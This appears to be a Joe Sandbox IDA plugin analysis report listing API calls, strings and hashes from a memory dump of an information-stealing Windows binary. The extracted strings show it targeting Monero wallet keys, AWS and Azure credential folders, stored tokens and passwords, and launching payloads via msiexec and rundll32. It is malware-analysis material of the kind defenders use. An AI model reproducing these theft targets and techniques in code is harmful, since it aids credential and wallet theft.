                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                    • String ID: "$"$------$------$------
                    • API String ID: 874700897-2180234286
                    • Opcode ID: 05ac3d59d9946250bf1a5654278725c7f31e2e78dc39a5c6dc83a637349ad9c5
                    • Instruction ID: b11f4cdf0a59af8c85802b71eb2af14cddc69e51243210cdf9046b1c4c212285
                    • Opcode Fuzzy Hash: 05ac3d59d9946250bf1a5654278725c7f31e2e78dc39a5c6dc83a637349ad9c5
                    • Instruction Fuzzy Hash: BA12FC71860118BEEB59EBA0DC95FEEB37AFF54700F40419DB10A62091EF706A49CF69
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 00648B60: GetSystemTime.KERNEL32(00650E1A,0144B8B0,006505AE,?,?,006313F9,?,0000001A,00650E1A,00000000,?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 00648B86
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0063CF83
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0063D0C7
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0063D0CE
                    • lstrcat.KERNEL32(?,00000000), ref: 0063D208
                    • lstrcat.KERNEL32(?,00651478), ref: 0063D217
                    • lstrcat.KERNEL32(?,00000000), ref: 0063D22A
                    • lstrcat.KERNEL32(?,0065147C), ref: 0063D239
                    • lstrcat.KERNEL32(?,00000000), ref: 0063D24C
                    • lstrcat.KERNEL32(?,00651480), ref: 0063D25B
                    • lstrcat.KERNEL32(?,00000000), ref: 0063D26E
                    • lstrcat.KERNEL32(?,00651484), ref: 0063D27D
                    • lstrcat.KERNEL32(?,00000000), ref: 0063D290
                    • lstrcat.KERNEL32(?,00651488), ref: 0063D29F
                    • lstrcat.KERNEL32(?,00000000), ref: 0063D2B2
                    • lstrcat.KERNEL32(?,0065148C), ref: 0063D2C1
                    • lstrcat.KERNEL32(?,00000000), ref: 0063D2D4
                    • lstrcat.KERNEL32(?,00651490), ref: 0063D2E3
                      • Part of subcall function 0064A820: lstrlen.KERNEL32(00634F05,?,?,00634F05,00650DDE), ref: 0064A82B
                      • Part of subcall function 0064A820: lstrcpy.KERNEL32(00650DDE,00000000), ref: 0064A885
                    • lstrlen.KERNEL32(?), ref: 0063D32A
                    • lstrlen.KERNEL32(?), ref: 0063D339
                      • Part of subcall function 0064AA70: StrCmpCA.SHLWAPI(0144A068,0063A7A7,?,0063A7A7,0144A068), ref: 0064AA8F
                    • DeleteFileA.KERNEL32(00000000), ref: 0063D3B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                    • String ID:
                    • API String ID: 1956182324-0
                    • Opcode ID: 935d73809c21ee889082d48280861ec04bb6c8c754814906e1a5579160eef635
                    • Instruction ID: ccec92ec61f21ee1ca6c342c247d05dee67175b94c6f8615e00aa314c4b633ca
                    • Opcode Fuzzy Hash: 935d73809c21ee889082d48280861ec04bb6c8c754814906e1a5579160eef635
                    • Instruction Fuzzy Hash: 29E15E71850108BBDB48EBE0DD9AEEE737AFF54301F104158F506A6091DE35AE49CBA6
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0144DF28,00000000,?,0065144C,00000000,?,?), ref: 0063CA6C
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0063CA89
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0063CA95
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0063CAA8
                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0063CAD9
                    • StrStrA.SHLWAPI(?,0144DE38,00650B52), ref: 0063CAF7
                    • StrStrA.SHLWAPI(00000000,0144E018), ref: 0063CB1E
                    • StrStrA.SHLWAPI(?,0144E8E0,00000000,?,00651458,00000000,?,00000000,00000000,?,0144A078,00000000,?,00651454,00000000,?), ref: 0063CCA2
                    • StrStrA.SHLWAPI(00000000,0144E900), ref: 0063CCB9
                      • Part of subcall function 0063C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0063C871
                      • Part of subcall function 0063C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0063C87C
                    • StrStrA.SHLWAPI(?,0144E900,00000000,?,0065145C,00000000,?,00000000,0144A098), ref: 0063CD5A
                    • StrStrA.SHLWAPI(00000000,01449E28), ref: 0063CD71
                      • Part of subcall function 0063C820: lstrcat.KERNEL32(?,00650B46), ref: 0063C943
                      • Part of subcall function 0063C820: lstrcat.KERNEL32(?,00650B47), ref: 0063C957
                      • Part of subcall function 0063C820: lstrcat.KERNEL32(?,00650B4E), ref: 0063C978
                    • lstrlen.KERNEL32(00000000), ref: 0063CE44
                    • CloseHandle.KERNEL32(00000000), ref: 0063CE9C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                    • String ID:
                    • API String ID: 3744635739-3916222277
                    • Opcode ID: 89d0d30f16a6364943c5c9d908dbf9345ffcc8f4c7d4783f435b188383f8f171
                    • Instruction ID: 1d89abe3d897fc94fc57956871f8dd0df7ff0405a703a06d07f3d061569b8b03
                    • Opcode Fuzzy Hash: 89d0d30f16a6364943c5c9d908dbf9345ffcc8f4c7d4783f435b188383f8f171
                    • Instruction Fuzzy Hash: 30E1E971850108BEEB58EBE0DC95FEEB77AFF54300F40415DF50666191EE306A8ACB6A
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • RegOpenKeyExA.ADVAPI32(00000000,0144C048,00000000,00020019,00000000,006505B6), ref: 006483A4
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00648426
                    • wsprintfA.USER32 ref: 00648459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0064847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 0064848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00648499
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                    • String ID: - $%s\%s$?
                    • API String ID: 3246050789-3278919252
                    • Opcode ID: 60c731dfa11d2fe8ba98ce4fe0c15c2781ee7bf261aa2a924e874942303735b3
                    • Instruction ID: 8f7bd391ea94e18b5a6b368bce6062067187cf90956b705ab28207df63a8f026
                    • Opcode Fuzzy Hash: 60c731dfa11d2fe8ba98ce4fe0c15c2781ee7bf261aa2a924e874942303735b3
                    • Instruction Fuzzy Hash: 4C810B71951118AFEB68DB94CC95FEEB7B9FF48700F008298E109A6180DF71AB85CF95
                    APIs
                      • Part of subcall function 00648DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00648E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00644DB0
                    • lstrcat.KERNEL32(?,\.azure\), ref: 00644DCD
                      • Part of subcall function 00644910: wsprintfA.USER32 ref: 0064492C
                      • Part of subcall function 00644910: FindFirstFileA.KERNEL32(?,?), ref: 00644943
                    • lstrcat.KERNEL32(?,00000000), ref: 00644E3C
                    • lstrcat.KERNEL32(?,\.aws\), ref: 00644E59
                      • Part of subcall function 00644910: StrCmpCA.SHLWAPI(?,00650FDC), ref: 00644971
                      • Part of subcall function 00644910: StrCmpCA.SHLWAPI(?,00650FE0), ref: 00644987
                      • Part of subcall function 00644910: FindNextFileA.KERNEL32(000000FF,?), ref: 00644B7D
                      • Part of subcall function 00644910: FindClose.KERNEL32(000000FF), ref: 00644B92
                    • lstrcat.KERNEL32(?,00000000), ref: 00644EC8
                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00644EE5
                      • Part of subcall function 00644910: wsprintfA.USER32 ref: 006449B0
                      • Part of subcall function 00644910: StrCmpCA.SHLWAPI(?,006508D2), ref: 006449C5
                      • Part of subcall function 00644910: wsprintfA.USER32 ref: 006449E2
                      • Part of subcall function 00644910: PathMatchSpecA.SHLWAPI(?,?), ref: 00644A1E
                      • Part of subcall function 00644910: lstrcat.KERNEL32(?,01450700), ref: 00644A4A
                      • Part of subcall function 00644910: lstrcat.KERNEL32(?,00650FF8), ref: 00644A5C
                      • Part of subcall function 00644910: lstrcat.KERNEL32(?,?), ref: 00644A70
                      • Part of subcall function 00644910: lstrcat.KERNEL32(?,00650FFC), ref: 00644A82
                      • Part of subcall function 00644910: lstrcat.KERNEL32(?,?), ref: 00644A96
                      • Part of subcall function 00644910: CopyFileA.KERNEL32(?,?,00000001), ref: 00644AAC
                      • Part of subcall function 00644910: DeleteFileA.KERNEL32(?), ref: 00644B31
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                    • API String ID: 949356159-974132213
                    • Opcode ID: 7c5f9da36c351089d07c542df87d97c1abf862f284f4eb0dd52117be9c1aa1b1
                    • Instruction ID: 1deea5e17f388ff86754500bfff3645bcd2969df3f19eb4eee7a682dc5d8ed89
                    • Opcode Fuzzy Hash: 7c5f9da36c351089d07c542df87d97c1abf862f284f4eb0dd52117be9c1aa1b1
                    • Instruction Fuzzy Hash: 9A41A6BA94020867D754F7B0EC47FED733AAB65705F004458B589660C1EEB49BCD8B93
                    APIs
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0064906C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: CreateGlobalStream
                    • String ID: image/jpeg
                    • API String ID: 2244384528-3785015651
                    • Opcode ID: 66de849d55882475984115713192380c30b4ed43ae5dd95cde36ea8c479be6a1
                    • Instruction ID: 99799d30d4eaf70e1ae8e4fa2299b1bc724bad45e0f47d5eaa7846b9e0b32c57
                    • Opcode Fuzzy Hash: 66de849d55882475984115713192380c30b4ed43ae5dd95cde36ea8c479be6a1
                    • Instruction Fuzzy Hash: 95710DB1910208ABDB08DFE4DC89FEEB7B9BF88700F148518F519A7294DB74E945CB61
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • ShellExecuteEx.SHELL32(0000003C), ref: 006431C5
                    • ShellExecuteEx.SHELL32(0000003C), ref: 0064335D
                    • ShellExecuteEx.SHELL32(0000003C), ref: 006434EA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell$lstrcpy
                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                    • API String ID: 2507796910-3625054190
                    • Opcode ID: 63401d8df6736aa1fcaf0994b67f6e6985048e9b0b535f390b33478e82e3d067
                    • Instruction ID: cd37d483dfea07126c597eb30c7bdda657617bc67b54dcbcba24a3c87c87d8ba
                    • Opcode Fuzzy Hash: 63401d8df6736aa1fcaf0994b67f6e6985048e9b0b535f390b33478e82e3d067
                    • Instruction Fuzzy Hash: 6612FC71850108AAEB59EBE0DC92FEDB73AAF14300F50415DF50666191EF346B4ACFAA
                    APIs
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 00636280: InternetOpenA.WININET(00650DFE,00000001,00000000,00000000,00000000), ref: 006362E1
                      • Part of subcall function 00636280: StrCmpCA.SHLWAPI(?,014507B0), ref: 00636303
                      • Part of subcall function 00636280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00636335
                      • Part of subcall function 00636280: HttpOpenRequestA.WININET(00000000,GET,?,0144FDD8,00000000,00000000,00400100,00000000), ref: 00636385
                      • Part of subcall function 00636280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006363BF
                      • Part of subcall function 00636280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006363D1
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00645318
                    • lstrlen.KERNEL32(00000000), ref: 0064532F
                      • Part of subcall function 00648E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00648E52
                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00645364
                    • lstrlen.KERNEL32(00000000), ref: 00645383
                    • lstrlen.KERNEL32(00000000), ref: 006453AE
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 3240024479-1526165396
                    • Opcode ID: 7ed1381226f2e2d1b70fd176c87768fabd4d07888d8257debcd2bc3e7a4e4dc6
                    • Instruction ID: 76e974f2972750f151d33788e739e88f095dc5384d0f954a8ff9d3075835ac86
                    • Opcode Fuzzy Hash: 7ed1381226f2e2d1b70fd176c87768fabd4d07888d8257debcd2bc3e7a4e4dc6
                    • Instruction Fuzzy Hash: 0A512C70950108AFEB58FFA0C996AED377BEF11304F50401CF80A5A592EF346B46CBA6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen
                    • String ID:
                    • API String ID: 2001356338-0
                    • Opcode ID: f131577186b836b25f0884f14027744e07734f36ce646becda3a20721b81749e
                    • Instruction ID: 1abfbe5ccc069f72284c62cda135f22393d3dfc07467cb0a0c7114e0dd21d87d
                    • Opcode Fuzzy Hash: f131577186b836b25f0884f14027744e07734f36ce646becda3a20721b81749e
                    • Instruction Fuzzy Hash: A2C1A4B5940109ABCB58EF60DC89FEE777ABF54304F00459CE50A67241DA70EAC5CFA5
                    APIs
                      • Part of subcall function 00648DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00648E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 006442EC
                    • lstrcat.KERNEL32(?,014503C0), ref: 0064430B
                    • lstrcat.KERNEL32(?,?), ref: 0064431F
                    • lstrcat.KERNEL32(?,0144DF10), ref: 00644333
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 00648D90: GetFileAttributesA.KERNEL32(00000000,?,00631B54,?,?,0065564C,?,?,00650E1F), ref: 00648D9F
                      • Part of subcall function 00639CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00639D39
                      • Part of subcall function 006399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006399EC
                      • Part of subcall function 006399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00639A11
                      • Part of subcall function 006399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00639A31
                      • Part of subcall function 006399C0: ReadFile.KERNEL32(000000FF,?,00000000,0063148F,00000000), ref: 00639A5A
                      • Part of subcall function 006399C0: LocalFree.KERNEL32(0063148F), ref: 00639A90
                      • Part of subcall function 006399C0: CloseHandle.KERNEL32(000000FF), ref: 00639A9A
                      • Part of subcall function 006493C0: GlobalAlloc.KERNEL32(00000000,006443DD,006443DD), ref: 006493D3
                    • StrStrA.SHLWAPI(?,01450408), ref: 006443F3
                    • GlobalFree.KERNEL32(?), ref: 00644512
                      • Part of subcall function 00639AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nc,00000000,00000000), ref: 00639AEF
                      • Part of subcall function 00639AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00634EEE,00000000,?), ref: 00639B01
                      • Part of subcall function 00639AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nc,00000000,00000000), ref: 00639B2A
                      • Part of subcall function 00639AC0: LocalFree.KERNEL32(?,?,?,?,00634EEE,00000000,?), ref: 00639B3F
                    • lstrcat.KERNEL32(?,00000000), ref: 006444A3
                    • StrCmpCA.SHLWAPI(?,006508D1), ref: 006444C0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 006444D2
                    • lstrcat.KERNEL32(00000000,?), ref: 006444E5
                    • lstrcat.KERNEL32(00000000,00650FB8), ref: 006444F4
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                    • String ID:
                    • API String ID: 3541710228-0
                    • Opcode ID: 95af23a9af824e58bc03f106c8372abc6ff91d1149303f1b88d457493ff5c114
                    • Instruction ID: c46c264cae39aedbf792dbbd2dfaf37f51627d278db1ef6b27ee9631b9176154
                    • Opcode Fuzzy Hash: 95af23a9af824e58bc03f106c8372abc6ff91d1149303f1b88d457493ff5c114
                    • Instruction Fuzzy Hash: 757126B6900208BBDB54EBE4DC89FEE737ABB88300F044598F50997185DA74DB45CF96
                    APIs
                      • Part of subcall function 006312A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006312B4
                      • Part of subcall function 006312A0: RtlAllocateHeap.NTDLL(00000000), ref: 006312BB
                      • Part of subcall function 006312A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006312D7
                      • Part of subcall function 006312A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006312F5
                      • Part of subcall function 006312A0: RegCloseKey.ADVAPI32(?), ref: 006312FF
                    • lstrcat.KERNEL32(?,00000000), ref: 0063134F
                    • lstrlen.KERNEL32(?), ref: 0063135C
                    • lstrcat.KERNEL32(?,.keys), ref: 00631377
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 00648B60: GetSystemTime.KERNEL32(00650E1A,0144B8B0,006505AE,?,?,006313F9,?,0000001A,00650E1A,00000000,?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 00648B86
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00631465
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 006399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006399EC
                      • Part of subcall function 006399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00639A11
                      • Part of subcall function 006399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00639A31
                      • Part of subcall function 006399C0: ReadFile.KERNEL32(000000FF,?,00000000,0063148F,00000000), ref: 00639A5A
                      • Part of subcall function 006399C0: LocalFree.KERNEL32(0063148F), ref: 00639A90
                      • Part of subcall function 006399C0: CloseHandle.KERNEL32(000000FF), ref: 00639A9A
                    • DeleteFileA.KERNEL32(00000000), ref: 006314EF
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                    • API String ID: 3478931302-218353709
                    • Opcode ID: b960d2b755156fb68c3b9c4ab29ef022d30a861d30dfdc42b39957b39b7d4382
                    • Instruction ID: 446299b1cfaa527d9b96e250535cd2194b8842081d8ed40ae2985fcc0d39137e
                    • Opcode Fuzzy Hash: b960d2b755156fb68c3b9c4ab29ef022d30a861d30dfdc42b39957b39b7d4382
                    • Instruction Fuzzy Hash: 385146B1D501196BDB55FB60DD96BED733EEF54304F40419CB60A62082EE306B89CFAA
                    APIs
                      • Part of subcall function 006372D0: memset.MSVCRT ref: 00637314
                      • Part of subcall function 006372D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0063733A
                      • Part of subcall function 006372D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006373B1
                      • Part of subcall function 006372D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0063740D
                      • Part of subcall function 006372D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00637452
                      • Part of subcall function 006372D0: HeapFree.KERNEL32(00000000), ref: 00637459
                    • lstrcat.KERNEL32(00000000,006517FC), ref: 00637606
                    • lstrcat.KERNEL32(00000000,00000000), ref: 00637648
                    • lstrcat.KERNEL32(00000000, : ), ref: 0063765A
                    • lstrcat.KERNEL32(00000000,00000000), ref: 0063768F
                    • lstrcat.KERNEL32(00000000,00651804), ref: 006376A0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 006376D3
                    • lstrcat.KERNEL32(00000000,00651808), ref: 006376ED
                    • task.LIBCPMTD ref: 006376FB
                    Strings
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                    • String ID: :
                    • API String ID: 3191641157-3653984579
                    • Opcode ID: 204bdfca54cab389222fa9c808640e579d3fbe0492e48eea10d67e509590c1c3
                    • Instruction ID: 4c62296e68352a24aaafc58f82d3eaac415624c57bd68786e65f4a55372914c3
                    • Opcode Fuzzy Hash: 204bdfca54cab389222fa9c808640e579d3fbe0492e48eea10d67e509590c1c3
                    • Instruction Fuzzy Hash: 7A3170B1900109DFCB48EBE4DC5ADFF737ABB95302F144018F116A7254DA34E986CB96
                    APIs
                    • memset.MSVCRT ref: 00637314
                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0063733A
                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006373B1
                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0063740D
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00637452
                    • HeapFree.KERNEL32(00000000), ref: 00637459
                    • task.LIBCPMTD ref: 00637555
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Heap$EnumFreeOpenProcessValuememsettask
                    • String ID: Password
                    • API String ID: 2808661185-3434357891
                    • Opcode ID: 3eea008bd992d107b5be7b7dbeb3f230d53dd8c1d9cb542d47ec5fd08e9b900a
                    • Instruction ID: d0b9508c6172a6473505fa8b696d026bf01484b13e94e5a650da0ac9c02a46a6
                    • Opcode Fuzzy Hash: 3eea008bd992d107b5be7b7dbeb3f230d53dd8c1d9cb542d47ec5fd08e9b900a
                    • Instruction Fuzzy Hash: D4611DB590425C9BDB24DB50CD45BDAB7B9BF44300F0081E9E689A6141DF70ABC9CFE5
                    APIs
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 006347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00634839
                      • Part of subcall function 006347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00634849
                    • InternetOpenA.WININET(00650DF7,00000001,00000000,00000000,00000000), ref: 0063610F
                    • StrCmpCA.SHLWAPI(?,014507B0), ref: 00636147
                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0063618F
                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006361B3
                    • InternetReadFile.WININET(?,?,00000400,?), ref: 006361DC
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0063620A
                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00636249
                    • InternetCloseHandle.WININET(?), ref: 00636253
                    • InternetCloseHandle.WININET(00000000), ref: 00636260
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                    • String ID:
                    • API String ID: 2507841554-0
                    • Opcode ID: 29eaa441706e87475d21afa0f87debc6b6c2727b06f2b20b9b7978160ee217ee
                    • Instruction ID: 972e823d7b9201fd2db9545c887226defc57c73972a1aa4a9cc7d0ebc839fe4e
                    • Opcode Fuzzy Hash: 29eaa441706e87475d21afa0f87debc6b6c2727b06f2b20b9b7978160ee217ee
                    • Instruction Fuzzy Hash: CA514171940218BBDB24DF90DC49BEE77BAFB44705F108098B609A71C1DB74AA85CF95
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                    • lstrlen.KERNEL32(00000000), ref: 0063BC9F
                      • Part of subcall function 00648E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00648E52
                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0063BCCD
                    • lstrlen.KERNEL32(00000000), ref: 0063BDA5
                    • lstrlen.KERNEL32(00000000), ref: 0063BDB9
                    Strings
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                    • API String ID: 3073930149-1079375795
                    • Opcode ID: 07fcd334d6a3cc6cd41c4189edf2a6c3fee4a34ef7b8f0618d0ad5b8f0ce68ce
                    • Instruction ID: 5a81a538920e1eef1a202c26f806d4123c640bc0ea390cd362036de5ea12403f
                    • Opcode Fuzzy Hash: 07fcd334d6a3cc6cd41c4189edf2a6c3fee4a34ef7b8f0618d0ad5b8f0ce68ce
                    • Instruction Fuzzy Hash: E3B14F71950108BBEB48EBE0DC96EEE733AFF54300F41415CF506A6091EF34AA49CBA6
                    APIs
                    Strings
                    Yara matches
                    Similarity
                    • API ID: ExitProcess$DefaultLangUser
                    • String ID: *
                    • API String ID: 1494266314-163128923
                    • Opcode ID: 267f32bcb0cbf858df70d673729166937cc0ed3d54e75f9be75acea31629588b
